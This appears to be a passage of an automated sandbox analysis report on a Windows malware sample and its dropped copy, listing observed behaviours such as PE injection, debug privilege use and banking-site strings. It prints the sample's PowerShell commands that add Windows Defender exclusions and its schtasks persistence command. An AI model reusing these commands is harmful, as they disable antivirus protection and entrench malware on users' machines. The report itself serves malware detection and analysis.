Source: tmp4AF1.tmp.14.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp4AF1.tmp.14.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmp4AF1.tmp.14.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp4AF1.tmp.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp4AF1.tmp.14.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp4AF1.tmp.14.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp4AF1.tmp.14.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: ECcZgk.exe, 0000000E.00000002.2312148295.00000000013F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR&
Source: tmp4AF1.tmp.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ECcZgk.exe, 0000000B.00000002.2196284895.0000000005030000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
Source: tmp4AF1.tmp.14.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp4AF1.tmp.14.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp4AF1.tmp.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp4AF1.tmp.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe" Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory written: C:\Users\user\Desktop\l2rMtmFkD6.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory written: C:\Users\user\AppData\Roaming\ECcZgk.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe" Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe" Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp" Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp"
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process created: C:\Users\user\AppData\Roaming\ECcZgk.exe "C:\Users\user\AppData\Roaming\ECcZgk.exe"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Users\user\Desktop\l2rMtmFkD6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Users\user\Desktop\l2rMtmFkD6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Users\user\AppData\Roaming\ECcZgk.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Users\user\AppData\Roaming\ECcZgk.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
